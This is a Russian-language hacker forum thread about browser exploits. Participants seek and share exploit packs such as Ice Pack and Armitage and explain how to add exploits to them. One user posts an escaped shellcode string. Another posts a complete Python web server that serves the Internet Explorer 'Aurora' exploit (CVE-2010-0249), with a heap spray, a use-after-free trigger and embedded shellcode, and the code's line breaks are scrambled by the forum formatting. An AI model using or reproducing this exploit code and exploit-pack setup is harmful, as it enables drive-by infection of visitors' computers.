Эксплойты для браузеров (IE, Mozilla, Opera, Chrome и др.)

Discussion in 'Защита ОС: антивирусы, фаерволы, антишпионы' started by KPOT_f!nd, 26 Sep 2006.

  1. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    тогда сорьь
     
  2. Звeрь

    Звeрь Banned

    Joined:
    25 Feb 2008
    Messages:
    0
    Likes Received:
    126
    Reputations:
    -6
    ищу хорошую связку может у ково есть дайте и о пишите как настроить её спасибо!
     
  3. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    Напишите в краце как можно примотать сплоит к связке или линк на статейку киньте... заранее спс
    и желательно на примере какой нть связки ( ice pack или armitage)
     
    #63 *DeViL*, 2 May 2008
    Last edited: 2 May 2008
  4. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    что ж там мотать - ложишь сплойт в папку сплойтов и дописываешь соответствующий include в разделе перебора браузеров (switch case или if else)
     
  5. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0
    Вот небольшой сплойтег под ие6
     
    #65 *DeViL*, 2 May 2008
    Last edited: 2 May 2008
    2 people like this.
  6. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    *DeViL*
    Это всё под шестой, седьмой они не пробивают
     
  7. *DeViL*

    *DeViL* Banned

    Joined:
    27 Nov 2007
    Messages:
    169
    Likes Received:
    56
    Reputations:
    0

    а в каком расширении эти сплоиты php или html ?...
     
  8. Лигендо Онтечада

    Joined:
    28 Apr 2008
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    Тупим? Это javascript
     
  9. Kila

    Kila Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    0
    Likes Received:
    44
    Reputations:
    -1
    Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель
     
  10. Звeрь

    Звeрь Banned

    Joined:
    25 Feb 2008
    Messages:
    0
    Likes Received:
    126
    Reputations:
    -6

    ставь на хостинг www.ho.ua
     
    4 people like this.
  11. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Облазил сайт - не нашел сам эксплоит, подскажите где взять?
     
    1 person likes this.
  12. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    http://www.xakep.ru/post/46406/default.asp
     
    3 people like this.
  13. ZloiSpy

    ZloiSpy New Member

    Joined:
    2 Nov 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    Может ты не из 6 осла пробовал, а из 7.
    7 на звере установлен.
     
  14. ZloiSpy

    ZloiSpy New Member

    Joined:
    2 Nov 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Может ты не из 6 осла пробовал, а из 7.
    7 на звере установлен.
     
  15. anticoder

    anticoder New Member

    Joined:
    4 Dec 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    помогите разобраться,

    во многих сплойтах встречаю строки типа:

    Code:
    //------------------Replace with your code-----------------------//
    	var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u  184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84  AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575  %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u  018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C  78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0  %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u  7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00  63");
    //------------------Replace with your code-----------------------//
    вопрос, как это хозяйство расшифровать?)

    пробовал так:

    Code:
    document.write  (unescape(Shellcode));
    но в результате получаю иероглифы. :(
    объясните плз как расшифровывать/зашифровывать код по такой схеме. день провел в гугле, но ничего толкового так и не нашел..
     
    #75 anticoder, 28 Nov 2009
    Last edited: 28 Nov 2009
  16. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Это не надо расшифровывать. Это нужно заменить своим кодом (payload)
     
  17. Liar

    Liar Active Member

    Joined:
    17 May 2007
    Messages:
    191
    Likes Received:
    205
    Reputations:
    20
    Эххх... а такой эксплоит то и пропустили :( ...
    а ведь и шуму то он наделал *речь о Авроре*



    PHP:

    #
    #   Author : Ahmed Obied ([email protected])
    #
    #   This program acts as a web server that generates an exploit to 
    #   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
    #   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
    #   The exploit's payload spawns the calculator. 
    #
    #   Usage  : python ie_aurora.py [port number]
    #   

    import sys
    import socket

    from BaseHTTPServer import HTTPServer
    BaseHTTPRequestHandler
            
    class RequestHandler(BaseHTTPRequestHandler):

        
    def convert_to_utf16(selfpayload):
            
    enc_payload ''
            
    for i in range(0len(payload), 2):
                
    num 0
                
    for j in range(02):
                    
    num += (ord(payload[j]) & 0xff) << (8)
                
    enc_payload += '%%u%04x' num
            
    return enc_payload
                    
        def get_payload
    (self):
            
    # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
            # http://metasploit.com
            
    payload  '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
            
    payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
            
    payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
            
    payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
            
    payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
            
    payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
            
    payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
            
    payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
            
    payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
            
    payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
            
    payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
            
    payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
            
    return self.convert_to_utf16(payload)
        
        
    def get_exploit(self):
            
    exploit '''
            <html>
            <head>
                <script>
                
                var obj, event_obj;
                
                function spray_heap()
                {
                    var chunk_size, payload, nopsled;
                
                    chunk_size = 0x80000;
                    payload = unescape("<PAYLOAD>");
                    nopsled = unescape("<NOP>");
                    while (nopsled.length < chunk_size)
                        nopsled += nopsled;
                    nopsled_len = chunk_size - (payload.length + 20);        
                    nopsled = nopsled.substring(0, nopsled_len);
                    heap_chunks = new Array();
                    for (var i = 0 ; i < 200 ; i++)
                        heap_chunks[i] = nopsled + payload;
                }
            
                function initialize()
                {
                    obj = new Array();
                    event_obj = null;
                    for (var i = 0; i < 200 ; i++ )
                        obj[i] = document.createElement("COMMENT");
                }
            
                function ev1(evt)
                {
                    event_obj = document.createEventObject(evt);
                    document.getElementById("sp1").innerHTML = "";
                    window.setInterval(ev2, 1);
                }
          
                function ev2()
                {
                    var data, tmp;
                    
                    data = "";
                    tmp = unescape("%u0a0a%u0a0a");
                    for (var i = 0 ; i < 4 ; i++)
                        data += tmp;
                    for (i = 0 ; i < obj.length ; i++ ) {
                        obj[i].data = data;
                    }
                    event_obj.srcElement;
                }
                        
                function check()
                {
                    if (navigator.userAgent.indexOf("MSIE") == -1)
                        return false;
                    return true;   
                }
                
                if (check()) {
                    initialize();
                    spray_heap();               
                }
                else
                    window.location = '
    about:blank'
                    
                </script>
            </head>
            <body>
                <span id="sp1">
                <img src="aurora.gif" onload="ev1(event)">
                </span>        
            </body>
            </html>
            '''
            
    exploit exploit.replace('<PAYLOAD>'self.get_payload())
            
    exploit exploit.replace('<NOP>''%u0a0a%u0a0a')
            return 
    exploit 

        def get_image
    (self):
            
    content  '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
            
    content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
            
    content += '\x01\x00\x3b'
            
    return content

        def log_request
    (self, *args, **kwargs):
            
    pass
            
        def do_GET
    (self):
            try:
                if 
    self.path == '/':
                    print
                    print 
    '[-] Incoming connection from %s' self.client_address[0]
                    
    self.send_response(200
                    
    self.send_header('Content-Type''text/html')
                    
    self.end_headers()
                    print 
    '[-] Sending exploit to %s ...' self.client_address[0]
                    
    self.wfile.write(self.get_exploit())
                    print 
    '[-] Exploit sent to %s' self.client_address[0]
                
    elif self.path == '/aurora.gif':      
                    
    self.send_response(200)
                    
    self.send_header('Content-Type''image/gif')
                    
    self.end_headers()
                    
    self.wfile.write(self.get_image())
            
    except
                print 
    '[*] Error : an error has occured while serving the HTTP request'
                
    print '[-] Exiting ...'
                
    sys.exit(-1)
                
                           
    def main():
        if 
    len(sys.argv) != 2:
            print 
    'Usage: %s [port number (between 1024 and 65535)]' sys.argv[0]
            
    sys.exit(0)
        try:
            
    port int(sys.argv[1])
            if 
    port 1024 or port 65535:
                
    raise ValueError
            
    try:
                
    serv HTTPServer((''port), RequestHandler)
                
    ip socket.gethostbyname(socket.gethostname())
                print 
    '[-] Web server is running at http://%s:%d/' % (ipport)
                try:
                    
    serv.serve_forever()
                
    except:
                    print 
    '[-] Exiting ...' 
            
    except socket.error:
                print 
    '[*] Error : a socket error has occurred'
            
    sys.exit(-1)    
        
    except ValueError:
            print 
    '[*] Error : an invalid port number was given'
            
    sys.exit(-1)
                
    if 
    __name__ == '__main__':
        
    main()
     
  18. giggi11

    giggi11 New Member

    Joined:
    24 May 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    благодарчик братцы
     
  19. nekromantos

    nekromantos Banned

    Joined:
    31 Mar 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    2 года аптайм в теме
     
  20. aleksmor

    aleksmor New Member

    Joined:
    23 Sep 2013
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Очередная оплошность, что еще раз доказало internet explorer это пережиток прошлого, от которого надо избавляться. Хотя и другие браузеры как Firefox или opera тоже состоят из одних недоработок, но надеюсь будущее за ними. Только все же с проверенным и привычным internet explorer расставаться неохота.